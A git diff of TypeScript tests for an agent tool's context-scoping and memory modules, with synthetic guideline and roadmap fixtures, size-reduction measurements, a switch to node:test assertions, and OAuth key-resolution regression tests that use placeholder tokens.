+## Security Guidelines
+Secrets never appear in logs or error messages.
+Environment variables validated at startup.
+CORS configured per-environment whitelist.
+CSP headers enforced for web responses.
+
+Input validation:
+- Zod schemas for request body parsing
+- Path parameters validated against patterns
+- Query parameters have default/max values
+
+Output encoding:
+- HTML entities escaped in templates
+- JSON stringification for API responses
+- URL encoding for redirect targets
+
+Authentication patterns:
+- JWT tokens with short expiry
+- Refresh token rotation
+- Session invalidation on logout
+- Multi-factor authentication support
+
+Authorization model:
+- Role-based access control (RBAC)
+- Resource-level permissions
+- Attribute-based policies (ABAC)
+- Principle of least privilege
+
+Secure communication:
+- TLS 1.3 minimum
+- Certificate pinning for mobile
+- HSTS preload list
+- Certificate transparency logging
+
+## Performance Optimization
+Critical paths target sub-10ms latency.
+Database queries use covering indexes.
+Response compression enabled for > 1KB bodies.
+Static assets served with immutable caching.
+
+Caching strategy:
+- Redis for session data
+- In-memory LRU for hot paths
+- CDN for static assets
+- Stale-while-revalidate for API responses
+
+Memory management:
+- Stream large payloads instead of buffering
+- Weak references for disposable caches
+- Manual GC hints for batch operations
+
+Query optimization:
+- Explain plans for complex queries
+- Index usage analysis
+- Query result caching
+- Connection pooling tuning
+
+Frontend performance:
+- Code splitting for lazy loading
+- Image optimization and lazy loading
+- Critical CSS inlining
+- Prefetching for likely navigations
+
+Backend performance:
+- Async I/O for non-blocking operations
+- Worker threads for CPU-bound tasks
+- Connection keep-alive
+- Response streaming
+
+## Deployment Architecture
+Containers built with multi-stage Dockerfiles.
+Kubernetes manifests in deploy/ directory.
+Horizontal pod autoscaling on CPU/memory.
+Rolling updates with zero-downtime.
+
+Environment hierarchy:
+- development: local Docker Compose
+- staging: shared k8s namespace
+- production: isolated k8s cluster
+
+Configuration:
+- ConfigMaps for non-sensitive config
+- Secrets for credentials
+- Environment-specific overlays via Kustomize
+
+Container best practices:
+- Non-root user in container
+- Read-only filesystem where possible
+- Resource limits and requests
+- Liveness and readiness probes
+
+Service mesh integration:
+- Istio for traffic management
+- mTLS for service-to-service auth
+- Retry and timeout policies
+- Circuit breaking configuration
+
+Disaster recovery:
+- Database replication across zones
+- Point-in-time recovery capability
+- Regular backup verification
+- Documented runbooks
+
+## Development Workflow
+Feature branches follow conventional commits.
+PRs require CI pass and code review.
+Main branch deploys to staging automatically.
+Release tags trigger production deployment.
+
+CI pipeline stages:
+1. Install dependencies
+2. Lint and type check
+3. Unit tests with coverage
+4. Build artifacts
+5. Integration tests
+6. Security scan
+
+Local development:
+- pnpm for package management
+- Turborepo for monorepo orchestration
+- Docker Compose for service dependencies
+
+Code review guidelines:
+- Focus on correctness and clarity
+- Security-sensitive changes require security review
+- Performance-critical paths need benchmarks
+- Breaking changes need migration guide
+
+Branch strategy:
+- main: production-ready code
+- develop: integration branch (optional)
+- feature/*: new functionality
+- fix/*: bug fixes
+- release/*: release preparation
+
+Documentation requirements:
+- README for project overview
+- API docs auto-generated from OpenAPI
+- Architecture decision records (ADRs)
+- Runbooks for operational procedures
+`;
+
+// ─── Synthetic Roadmap Fixture (~1KB, 4 slices) ────────────────────────────
+
+const syntheticRoadmap = `# M005: Tiered Context Injection
+
+## Vision
+Refactor prompt builders to inject relevance-scoped context instead of full files.
+This reduces token consumption and improves agent focus on relevant information.
+
+## Success Criteria
+- [ ] 40% reduction in injected context size
+- [ ] No regression in agent task completion rate
+- [ ] Measurable test confirms reduction target
+
+## Slice Overview
+| ID | Slice | Risk | Depends | Done | After this |
+|----|-------|------|---------|------|------------|
+| S01 | Scope existing DB queries | low | — | ✅ | planSlice and researchSlice use milestone+slice filters for decisions/requirements. |
+| S02 | KNOWLEDGE scoping + roadmap excerpt | medium | S01 | ⬜ | KNOWLEDGE sections filtered by keywords. Roadmap injected as excerpt. |
+| S03 | Measurement test suite | low | S02 | ⬜ | Automated tests confirm 40% reduction vs baseline. |
+| S04 | Documentation and rollout | low | S03 | ⬜ | Updated docs. Feature flag for gradual rollout. |
+
+## Key Risks
+1. Keyword extraction may miss relevant sections — mitigate with fallback to full content
+2. Excerpt parsing fragile to roadmap format changes — mitigate with graceful degradation
+
+## Definition of Done
+- [ ] All slices complete with passing verification
+- [ ] Measurement tests in CI
+- [ ] No increase in prompt build latency
+`;
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Measurement Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe("measurement: context reduction verification", () => {
+  test("synthetic KNOWLEDGE fixture is ~8KB as specified", () => {
+    const sizeKB = syntheticKnowledge.length / 1024;
+    assert.ok(
+      sizeKB >= 7 && sizeKB <= 10,
+      `KNOWLEDGE fixture should be ~8KB, got ${sizeKB.toFixed(2)}KB`
+    );
+  });
+
+  test("synthetic KNOWLEDGE has 9 H2 sections", () => {
+    const h2Count = (syntheticKnowledge.match(/^## /gm) || []).length;
+    assert.strictEqual(h2Count, 9, `KNOWLEDGE fixture should have 9 H2 sections, got ${h2Count}`);
+  });
+
+  test("queryKnowledge achieves ≥40% reduction with targeted keywords", async () => {
+    // Keywords targeting 2 sections: "Database Patterns" and "Testing Strategy"
+    const keywords = ['database', 'testing'];
+    
+    const scopedResult = await queryKnowledge(syntheticKnowledge, keywords);
+    
+    const fullSize = syntheticKnowledge.length;
+    const scopedSize = scopedResult.length;
+    const reductionPct = ((fullSize - scopedSize) / fullSize) * 100;
+    
+    // Verify we got matching sections
+    assert.match(scopedResult, /## Database Patterns/, 'should include Database section');
+    assert.match(scopedResult, /## Testing Strategy/, 'should include Testing section');
+    
+    // Verify we excluded other sections
+    assert.ok(!scopedResult.includes('## API Design'), 'should exclude API section');
+    assert.ok(!scopedResult.includes('## Observability'), 'should exclude Observability section');
+    assert.ok(!scopedResult.includes('## Deployment'), 'should exclude Deployment section');
+    
+    // Verify ≥40% reduction (2/9 sections = ~78% reduction expected)
+    assert.ok(
+      reductionPct >= 40,
+      `queryKnowledge should achieve ≥40% reduction, got ${reductionPct.toFixed(1)}% (${scopedSize} chars vs ${fullSize} chars)`
+    );
+    
+    console.log(`  → queryKnowledge: ${reductionPct.toFixed(1)}% reduction (${scopedSize} → ${fullSize} chars)`);
+  });
+
+  test("queryKnowledge with single keyword achieves ≥40% reduction", async () => {
+    // Single keyword targeting 1 section
+    const keywords = ['security'];
+    
+    const scopedResult = await queryKnowledge(syntheticKnowledge, keywords);
+    
+    const fullSize = syntheticKnowledge.length;
+    const scopedSize = scopedResult.length;
+    const reductionPct = ((fullSize - scopedSize) / fullSize) * 100;
+    
+    // Verify we got matching section
+    assert.match(scopedResult, /## Security Guidelines/, 'should include Security section');
+    
+    // Verify ≥40% reduction (1/9 sections = ~89% reduction expected)
+    assert.ok(
+      reductionPct >= 40,
+      `single keyword should achieve ≥40% reduction, got ${reductionPct.toFixed(1)}%`
+    );
+  });
+
+  test("formatRoadmapExcerpt achieves ≥40% reduction", () => {
+    const sliceId = 'S02';
+    
+    const excerptResult = formatRoadmapExcerpt(syntheticRoadmap, sliceId, '.gsd/milestones/M005/M005-ROADMAP.md');
+    
+    const fullSize = syntheticRoadmap.length;
+    const excerptSize = excerptResult.length;
+    const reductionPct = ((fullSize - excerptSize) / fullSize) * 100;
+    
+    // Verify excerpt contains required elements
+    assert.match(excerptResult, /\| ID \| Slice \|/, 'should have table header');
+    assert.match(excerptResult, /\| S01 \|/, 'should have predecessor S01');
+    assert.match(excerptResult, /\| S02 \|/, 'should have target S02');
+    assert.match(excerptResult, /See full roadmap:/, 'should have reference directive');
+    
+    // Verify we excluded other slices
+    assert.ok(!excerptResult.includes('| S03 |'), 'should exclude S03');
+    assert.ok(!excerptResult.includes('| S04 |'), 'should exclude S04');
+    
+    // Verify ≥40% reduction (2 rows + overhead vs full roadmap = significant reduction)
+    assert.ok(
+      reductionPct >= 40,
+      `formatRoadmapExcerpt should achieve ≥40% reduction, got ${reductionPct.toFixed(1)}% (${excerptSize} chars vs ${fullSize} chars)`
+    );
+    
+    console.log(`  → formatRoadmapExcerpt: ${reductionPct.toFixed(1)}% reduction (${excerptSize} → ${fullSize} chars)`);
+  });
+
+  test("combined KNOWLEDGE + roadmap reduction exceeds 40%", async () => {
+    // Simulate what happens in buildPlanSlicePrompt
+    const keywords = ['database', 'testing'];
+    
+    const scopedKnowledge = await queryKnowledge(syntheticKnowledge, keywords);
+    const scopedRoadmap = formatRoadmapExcerpt(syntheticRoadmap, 'S02');
+    
+    const fullKnowledgeSize = syntheticKnowledge.length;
+    const fullRoadmapSize = syntheticRoadmap.length;
+    const fullTotal = fullKnowledgeSize + fullRoadmapSize;
+    
+    const scopedKnowledgeSize = scopedKnowledge.length;
+    const scopedRoadmapSize = scopedRoadmap.length;
+    const scopedTotal = scopedKnowledgeSize + scopedRoadmapSize;
+    
+    const combinedReductionPct = ((fullTotal - scopedTotal) / fullTotal) * 100;
+    
+    // Combined reduction should easily exceed 40%
+    assert.ok(
+      combinedReductionPct >= 40,
+      `combined reduction should be ≥40%, got ${combinedReductionPct.toFixed(1)}%`
+    );
+    
+    console.log(`  → Combined: ${combinedReductionPct.toFixed(1)}% reduction`);
+    console.log(`    - KNOWLEDGE: ${fullKnowledgeSize} → ${scopedKnowledgeSize} chars`);
+    console.log(`    - Roadmap: ${fullRoadmapSize} → ${scopedRoadmapSize} chars`);
+    console.log(`    - Total: ${fullTotal} → ${scopedTotal} chars`);
+  });
+});
+
+describe("measurement: edge cases maintain reduction target", () => {
+  test("three keywords still achieves ≥40% reduction", async () => {
+    // Even with 3 matching sections (3/9 = 33%), we should hit target
+    const keywords = ['database', 'api', 'security'];
+    
+    const scopedResult = await queryKnowledge(syntheticKnowledge, keywords);
+    
+    const fullSize = syntheticKnowledge.length;
+    const scopedSize = scopedResult.length;
+    const reductionPct = ((fullSize - scopedSize) / fullSize) * 100;
+    
+    // Verify matches (3 sections)
+    assert.match(scopedResult, /## Database Patterns/, 'should include Database');
+    assert.match(scopedResult, /## API Design/, 'should include API');
+    assert.match(scopedResult, /## Security Guidelines/, 'should include Security');
+    
+    // With 3/9 sections, reduction should be ~67%
+    assert.ok(
+      reductionPct >= 40,
+      `3 keywords should still achieve ≥40% reduction, got ${reductionPct.toFixed(1)}%`
+    );
+  });
+
+  test("excerpt for S01 (no dependencies) achieves ≥40% reduction", () => {
+    const excerptResult = formatRoadmapExcerpt(syntheticRoadmap, 'S01');
+    
+    const fullSize = syntheticRoadmap.length;
+    const excerptSize = excerptResult.length;
+    const reductionPct = ((fullSize - excerptSize) / fullSize) * 100;
+    
+    // S01 has no predecessor, so just 1 row + header + reference
+    assert.match(excerptResult, /\| S01 \|/, 'should have S01');
+    assert.ok(!excerptResult.includes('| S02 |'), 'should not have S02');
+    
+    // Single row should still achieve significant reduction
+    assert.ok(
+      reductionPct >= 40,
+      `S01 excerpt should achieve ≥40% reduction, got ${reductionPct.toFixed(1)}%`
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/memory-extractor.test.ts b/src/resources/extensions/gsd/tests/memory-extractor.test.ts
index a4e4f7031..47839f67b 100644
--- a/src/resources/extensions/gsd/tests/memory-extractor.test.ts
+++ b/src/resources/extensions/gsd/tests/memory-extractor.test.ts
@@ -1,5 +1,4 @@
-import { createTestContext } from './test-helpers.ts';
-import { parseMemoryResponse, _resetExtractionState } from '../memory-extractor.ts';
+import { parseMemoryResponse, _resetExtractionState, buildMemoryLLMCall } from '../memory-extractor.ts';
 import {
   openDatabase,
   closeDatabase,
@@ -10,15 +9,14 @@ import {
   getActiveMemoriesRanked,
 } from '../memory-store.ts';
 import type { MemoryAction } from '../memory-store.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
+import { describe, test, beforeEach, afterEach, mock } from 'node:test';
+import assert from 'node:assert/strict';
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-extractor: parse valid JSON response
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-extractor: parse valid JSON ===');
-{
+test('memory-extractor: parse valid JSON', () => {
   const response = JSON.stringify([
     { action: 'CREATE', category: 'gotcha', content: 'esbuild drops binaries', confidence: 0.85 },
     { action: 'REINFORCE', id: 'MEM001' },
@@ -27,56 +25,52 @@ console.log('\n=== memory-extractor: parse valid JSON ===');
   ]);
 
   const actions = parseMemoryResponse(response);
-  assertEq(actions.length, 4, 'should parse 4 actions');
-  assertEq(actions[0].action, 'CREATE', 'first action should be CREATE');
-  assertEq((actions[0] as any).category, 'gotcha', 'CREATE category');
-  assertEq((actions[0] as any).confidence, 0.85, 'CREATE confidence');
-  assertEq(actions[1].action, 'REINFORCE', 'second action should be REINFORCE');
-  assertEq(actions[2].action, 'UPDATE', 'third action should be UPDATE');
-  assertEq(actions[3].action, 'SUPERSEDE', 'fourth action should be SUPERSEDE');
-}
+  assert.deepStrictEqual(actions.length, 4, 'should parse 4 actions');
+  assert.deepStrictEqual(actions[0].action, 'CREATE', 'first action should be CREATE');
+  assert.deepStrictEqual((actions[0] as any).category, 'gotcha', 'CREATE category');
+  assert.deepStrictEqual((actions[0] as any).confidence, 0.85, 'CREATE confidence');
+  assert.deepStrictEqual(actions[1].action, 'REINFORCE', 'second action should be REINFORCE');
+  assert.deepStrictEqual(actions[2].action, 'UPDATE', 'third action should be UPDATE');
+  assert.deepStrictEqual(actions[3].action, 'SUPERSEDE', 'fourth action should be SUPERSEDE');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-extractor: parse fenced JSON response
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-extractor: parse fenced JSON ===');
-{
+test('memory-extractor: parse fenced JSON', () => {
   const response = '```json\n[\n  {"action": "CREATE", "category": "convention", "content": "test memory"}\n]\n```';
 
   const actions = parseMemoryResponse(response);
-  assertEq(actions.length, 1, 'should parse 1 action from fenced JSON');
-  assertEq(actions[0].action, 'CREATE', 'action should be CREATE');
-}
+  assert.deepStrictEqual(actions.length, 1, 'should parse 1 action from fenced JSON');
+  assert.deepStrictEqual(actions[0].action, 'CREATE', 'action should be CREATE');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-extractor: parse empty array response
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-extractor: parse empty array ===');
-{
+test('memory-extractor: parse empty array', () => {
   const actions = parseMemoryResponse('[]');
-  assertEq(actions.length, 0, 'empty array should parse to empty actions');
-}
+  assert.deepStrictEqual(actions.length, 0, 'empty array should parse to empty actions');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-extractor: parse malformed response
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-extractor: malformed responses ===');
-{
-  assertEq(parseMemoryResponse('not json at all'), [], 'garbage text should return []');
-  assertEq(parseMemoryResponse('{"action": "CREATE"}'), [], 'non-array should return []');
-  assertEq(parseMemoryResponse(''), [], 'empty string should return []');
-  assertEq(parseMemoryResponse('```\nbroken\n```'), [], 'fenced non-JSON should return []');
-}
+test('memory-extractor: malformed responses', () => {
+  assert.deepStrictEqual(parseMemoryResponse('not json at all'), [], 'garbage text should return []');
+  assert.deepStrictEqual(parseMemoryResponse('{"action": "CREATE"}'), [], 'non-array should return []');
+  assert.deepStrictEqual(parseMemoryResponse(''), [], 'empty string should return []');
+  assert.deepStrictEqual(parseMemoryResponse('```\nbroken\n```'), [], 'fenced non-JSON should return []');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-extractor: validation of required fields
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-extractor: field validation ===');
-{
+test('memory-extractor: field validation', () => {
   const response = JSON.stringify([
     // Valid CREATE
     { action: 'CREATE', category: 'gotcha', content: 'valid' },
@@ -103,19 +97,18 @@ console.log('\n=== memory-extractor: field validation ===');
   ]);
 
   const actions = parseMemoryResponse(response);
-  assertEq(actions.length, 4, 'should only accept 4 valid actions');
-  assertEq(actions[0].action, 'CREATE', 'first valid is CREATE');
-  assertEq(actions[1].action, 'REINFORCE', 'second valid is REINFORCE');
-  assertEq(actions[2].action, 'UPDATE', 'third valid is UPDATE');
-  assertEq(actions[3].action, 'SUPERSEDE', 'fourth valid is SUPERSEDE');
-}
+  assert.deepStrictEqual(actions.length, 4, 'should only accept 4 valid actions');
+  assert.deepStrictEqual(actions[0].action, 'CREATE', 'first valid is CREATE');
+  assert.deepStrictEqual(actions[1].action, 'REINFORCE', 'second valid is REINFORCE');
+  assert.deepStrictEqual(actions[2].action, 'UPDATE', 'third valid is UPDATE');
+  assert.deepStrictEqual(actions[3].action, 'SUPERSEDE', 'fourth valid is SUPERSEDE');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Integration: applyMemoryActions with mixed actions
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== integration: mixed action lifecycle ===');
-{
+test('integration: mixed action lifecycle', () => {
   openDatabase(':memory:');
 
   // Phase 1: Create initial memories
@@ -126,7 +119,7 @@ console.log('\n=== integration: mixed action lifecycle ===');
   ], 'plan-slice', 'M001/S01');
 
   let active = getActiveMemoriesRanked(30);
-  assertEq(active.length, 3, 'phase 1: 3 active memories');
+  assert.deepStrictEqual(active.length, 3, 'phase 1: 3 active memories');
 
   // Phase 2: Reinforce one, update another, create new
   applyMemoryActions([
@@ -136,13 +129,13 @@ console.log('\n=== integration: mixed action lifecycle ===');
   ], 'execute-task', 'M001/S01/T01');
 
   active = getActiveMemoriesRanked(30);
-  assertEq(active.length, 4, 'phase 2: 4 active memories');
-  assertEq(
+  assert.deepStrictEqual(active.length, 4, 'phase 2: 4 active memories');
+  assert.deepStrictEqual(
     active.find(m => m.id === 'MEM001')?.content,
     'npm run build requires tsc --noEmit first',
     'MEM001 content should be updated',
   );
-  assertEq(active.find(m => m.id === 'MEM002')?.hit_count, 1, 'MEM002 should be reinforced');
+  assert.deepStrictEqual(active.find(m => m.id === 'MEM002')?.hit_count, 1, 'MEM002 should be reinforced');
 
   // Phase 3: Supersede MEM001 with MEM005
   applyMemoryActions([
@@ -151,30 +144,111 @@ console.log('\n=== integration: mixed action lifecycle ===');
   ], 'execute-task', 'M001/S01/T02');
 
   active = getActiveMemoriesRanked(30);
-  assertEq(active.length, 4, 'phase 3: 4 active (1 superseded, 1 created)');
-  assertTrue(!active.find(m => m.id === 'MEM001'), 'MEM001 should be superseded');
-  assertTrue(!!active.find(m => m.id === 'MEM005'), 'MEM005 should be active');
+  assert.deepStrictEqual(active.length, 4, 'phase 3: 4 active (1 superseded, 1 created)');
+  assert.ok(!active.find(m => m.id === 'MEM001'), 'MEM001 should be superseded');
+  assert.ok(!!active.find(m => m.id === 'MEM005'), 'MEM005 should be active');
 
   // Verify ranking: MEM003 (0.85) > MEM005 (0.9) but MEM002 has 1 hit
   // MEM002: 0.8 * (1 + 1*0.1) = 0.88
   // MEM003: 0.85 * 1.0 = 0.85
   // MEM005: 0.9 * 1.0 = 0.9
   // MEM004: 0.75 * 1.0 = 0.75
-  assertEq(active[0].id, 'MEM005', 'MEM005 should rank first (0.9)');
-  assertEq(active[1].id, 'MEM002', 'MEM002 should rank second (0.88)');
+  assert.deepStrictEqual(active[0].id, 'MEM005', 'MEM005 should rank first (0.9)');
+  assert.deepStrictEqual(active[1].id, 'MEM002', 'MEM002 should rank second (0.88)');
 
   closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-extractor: _resetExtractionState
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-extractor: reset extraction state ===');
-{
+test('memory-extractor: reset extraction state', () => {
   // Just verify it doesn't throw
   _resetExtractionState();
-  assertTrue(true, '_resetExtractionState should not throw');
-}
+  assert.ok(true, '_resetExtractionState should not throw');
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// memory-extractor: buildMemoryLLMCall resolves OAuth API key via modelRegistry
+// Regression test for #2959 — OAuth users had broken memory extraction
+// because streamSimpleAnthropic only checked env vars, not auth.json.
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('memory-extractor: buildMemoryLLMCall resolves API key from modelRegistry for OAuth users', async () => {
+  const OAUTH_TOKEN = 'sk-ant-oat-test-oauth-token-12345';
+  let getApiKeyCalled = false;
+
+  const fakeModel = {
+    id: 'claude-haiku-test',
+    provider: 'anthropic',
+    api: 'anthropic-messages',
+    cost: { input: 0.25, output: 1.25 },
+  };
+
+  const ctx = {
+    modelRegistry: {
+      getAvailable: () => [fakeModel],
+      getApiKey: async (_model: any) => {
+        getApiKeyCalled = true;
+        return OAUTH_TOKEN;
+      },
+    },
+  } as any;
+
+  const llmCallFn = buildMemoryLLMCall(ctx);
+  assert.ok(llmCallFn !== null, 'buildMemoryLLMCall should return a function when models are available');
+
+  // The function should have resolved the API key eagerly via modelRegistry.getApiKey.
+  // Give the async getApiKey a tick to resolve.
+  await new Promise(resolve => setTimeout(resolve, 50));
+  assert.ok(getApiKeyCalled, 'buildMemoryLLMCall must call modelRegistry.getApiKey() to resolve OAuth tokens');
+});
+
+test('memory-extractor: buildMemoryLLMCall returns null when no models available', () => {
+  const ctx = {
+    modelRegistry: {
+      getAvailable: () => [],
+      getApiKey: async () => undefined,
+    },
+  } as any;
+
+  const llmCallFn = buildMemoryLLMCall(ctx);
+  assert.strictEqual(llmCallFn, null, 'should return null when no models available');
+});
+
+test('memory-extractor: buildMemoryLLMCall prefers haiku model', async () => {
+  let resolvedModelId: string | undefined;
+
+  const haikuModel = {
+    id: 'claude-3-5-haiku-20241022',
+    provider: 'anthropic',
+    api: 'anthropic-messages',
+    cost: { input: 0.25, output: 1.25 },
+  };
+  const sonnetModel = {
+    id: 'claude-sonnet-4-20250514',
+    provider: 'anthropic',
+    api: 'anthropic-messages',
+    cost: { input: 3, output: 15 },
+  };
+
+  const ctx = {
+    modelRegistry: {
+      getAvailable: () => [sonnetModel, haikuModel],
+      getApiKey: async (model: any) => {
+        resolvedModelId = model.id;
+        return 'sk-ant-oat-test-token';
+      },
+    },
+  } as any;
+
+  const llmCallFn = buildMemoryLLMCall(ctx);
+  assert.ok(llmCallFn !== null, 'should return a function');
+
+  // Wait for the async getApiKey to resolve
+  await new Promise(resolve => setTimeout(resolve, 50));
+  assert.strictEqual(resolvedModelId, 'claude-3-5-haiku-20241022',
+    'should resolve API key for haiku model, not sonnet');
+});
 
-report();
diff --git a/src/resources/extensions/gsd/tests/memory-store.test.ts b/src/resources/extensions/gsd/tests/memory-store.test.ts
index 1d7b56d95..2b17dd955 100644
--- a/src/resources/extensions/gsd/tests/memory-store.test.ts
+++ b/src/resources/extensions/gsd/tests/memory-store.test.ts
@@ -1,4 +1,3 @@
-import { createTestContext } from './test-helpers.ts';
 import {
   openDatabase,
   closeDatabase,
@@ -21,94 +20,90 @@ import {
   formatMemoriesForPrompt,
 } from '../memory-store.ts';
 import type { MemoryAction } from '../memory-store.ts';
-
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: fallback when DB not open
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: fallback returns empty when DB not open ===');
-{
+test('memory-store: fallback returns empty when DB not open', () => {
   closeDatabase();
-  assertTrue(!isDbAvailable(), 'DB should not be available');
+  assert.ok(!isDbAvailable(), 'DB should not be available');
 
-  assertEq(getActiveMemories(), [], 'getActiveMemories returns [] when DB closed');
-  assertEq(getActiveMemoriesRanked(), [], 'getActiveMemoriesRanked returns [] when DB closed');
-  assertEq(nextMemoryId(), 'MEM001', 'nextMemoryId returns MEM001 when DB closed');
-  assertEq(createMemory({ category: 'test', content: 'test' }), null, 'createMemory returns null when DB closed');
-  assertTrue(!reinforceMemory('MEM001'), 'reinforceMemory returns false when DB closed');
-  assertTrue(!isUnitProcessed('test/key'), 'isUnitProcessed returns false when DB closed');
-}
+  assert.deepStrictEqual(getActiveMemories(), [], 'getActiveMemories returns [] when DB closed');
+  assert.deepStrictEqual(getActiveMemoriesRanked(), [], 'getActiveMemoriesRanked returns [] when DB closed');
+  assert.deepStrictEqual(nextMemoryId(), 'MEM001', 'nextMemoryId returns MEM001 when DB closed');
+  assert.deepStrictEqual(createMemory({ category: 'test', content: 'test' }), null, 'createMemory returns null when DB closed');
+  assert.ok(!reinforceMemory('MEM001'), 'reinforceMemory returns false when DB closed');
+  assert.ok(!isUnitProcessed('test/key'), 'isUnitProcessed returns false when DB closed');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: CRUD operations
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: create and query memories ===');
-{
+test('memory-store: create and query memories', () => {
   openDatabase(':memory:');
 
   // Create memories
   const id1 = createMemory({ category: 'gotcha', content: 'esbuild drops .node binaries' });
-  assertTrue(id1 !== null, 'createMemory should return an ID');
-  assertEq(id1, 'MEM001', 'first memory ID should be MEM001');
+  assert.ok(id1 !== null, 'createMemory should return an ID');
+  assert.deepStrictEqual(id1, 'MEM001', 'first memory ID should be MEM001');
 
   const id2 = createMemory({ category: 'convention', content: 'use :memory: for tests', confidence: 0.9 });
-  assertEq(id2, 'MEM002', 'second memory ID should be MEM002');
+  assert.deepStrictEqual(id2, 'MEM002', 'second memory ID should be MEM002');
 
   const id3 = createMemory({ category: 'architecture', content: 'extensions discovered from src/resources/' });
-  assertEq(id3, 'MEM003', 'third memory ID should be MEM003');
+  assert.deepStrictEqual(id3, 'MEM003', 'third memory ID should be MEM003');
 
   // Query all active
   const active = getActiveMemories();
-  assertEq(active.length, 3, 'should have 3 active memories');
-  assertEq(active[0].category, 'gotcha', 'first memory category');
-  assertEq(active[0].content, 'esbuild drops .node binaries', 'first memory content');
-  assertEq(active[1].confidence, 0.9, 'second memory confidence');
+  assert.deepStrictEqual(active.length, 3, 'should have 3 active memories');
+  assert.deepStrictEqual(active[0].category, 'gotcha', 'first memory category');
+  assert.deepStrictEqual(active[0].content, 'esbuild drops .node binaries', 'first memory content');
+  assert.deepStrictEqual(active[1].confidence, 0.9, 'second memory confidence');
 
   closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: update and reinforce
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: update and reinforce ===');
-{
+test('memory-store: update and reinforce', () => {
   openDatabase(':memory:');
 
   createMemory({ category: 'gotcha', content: 'original content' });
 
   // Update content
   const updated = updateMemoryContent('MEM001', 'revised content', 0.95);
-  assertTrue(updated, 'updateMemoryContent should return true');
+  assert.ok(updated, 'updateMemoryContent should return true');
 
   const active = getActiveMemories();
-  assertEq(active[0].content, 'revised content', 'content should be updated');
-  assertEq(active[0].confidence, 0.95, 'confidence should be updated');
+  assert.deepStrictEqual(active[0].content, 'revised content', 'content should be updated');
+  assert.deepStrictEqual(active[0].confidence, 0.95, 'confidence should be updated');
 
   // Reinforce
   const reinforced = reinforceMemory('MEM001');
-  assertTrue(reinforced, 'reinforceMemory should return true');
+  assert.ok(reinforced, 'reinforceMemory should return true');
 
   const after = getActiveMemories();
-  assertEq(after[0].hit_count, 1, 'hit_count should be 1 after reinforce');
+  assert.deepStrictEqual(after[0].hit_count, 1, 'hit_count should be 1 after reinforce');
 
   // Reinforce again
   reinforceMemory('MEM001');
   const after2 = getActiveMemories();
-  assertEq(after2[0].hit_count, 2, 'hit_count should be 2 after second reinforce');
+  assert.deepStrictEqual(after2[0].hit_count, 2, 'hit_count should be 2 after second reinforce');
 
   closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: supersede
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: supersede ===');
-{
+test('memory-store: supersede', () => {
   openDatabase(':memory:');
 
   createMemory({ category: 'convention', content: 'old convention' });
@@ -117,18 +112,17 @@ console.log('\n=== memory-store: supersede ===');
   supersedeMemory('MEM001', 'MEM002');
 
   const active = getActiveMemories();
-  assertEq(active.length, 1, 'should have 1 active memory after supersede');
-  assertEq(active[0].id, 'MEM002', 'active memory should be MEM002');
+  assert.deepStrictEqual(active.length, 1, 'should have 1 active memory after supersede');
+  assert.deepStrictEqual(active[0].id, 'MEM002', 'active memory should be MEM002');
 
   closeDatabase();
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // memory-store: ranked query ordering
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== memory-store: ranked query ordering ===');
-{
+test('memory-store: ranked query ordering', () => {
   openDatabase(':memory:');
 
   // Low confidence, no hits
@@ -142,45 +136,43 @@ console.log('\n=== memory-store: ranked query ordering ===');
   for (let i = 0; i < 10; i++) reinforceMemory('MEM003');
 
   const ranked = getActiveMemoriesRanked(10);
-  assertEq(ranked.length, 3, 'should have 3 ranked memories');
+  assert.deepStrictEqual(ranked.length, 3, 'should have 3 ranked memories');
   // MEM003: 0.7 * (1 + 10*0.1) = 0.7 * 2.0 = 1.4
   // MEM002: 0.95 * (1 + 0*0.1) = 0.95
   // MEM001: 0.5 * (1 + 0*0.1) = 0.5
-  assertEq(ranked[0].id, 'MEM003', 'highest ranked should be MEM003 (reinforced)');
-  assertEq(ranked[1].id, 'MEM002', 'second ranked should be MEM002 (high confidence)');
-  assertEq(ranked[2].id, 'MEM001', 'lowest ranked should be MEM001');
+  assert.deepStrictEqual(ranked[0].id, 'MEM003', 'highest ranked should be MEM003 (reinforced)');
+  assert.deepStrictEqual(ranked[1].id, 'MEM002', 'second ranked should be MEM002 (high confidence)');
+  assert.deepStrictEqual(ranked[2].id, 'MEM001', 'lowest ranked should be MEM001');
 
   // Test limit
   const limited = getActiveMemoriesRanked(2);
-  assertEq(limited.length, 2, 'limit should cap results');
+  assert.deepStrictEqual(limited.length, 2, 'limit should cap results');
 
   closeDatabase();
-}
+});
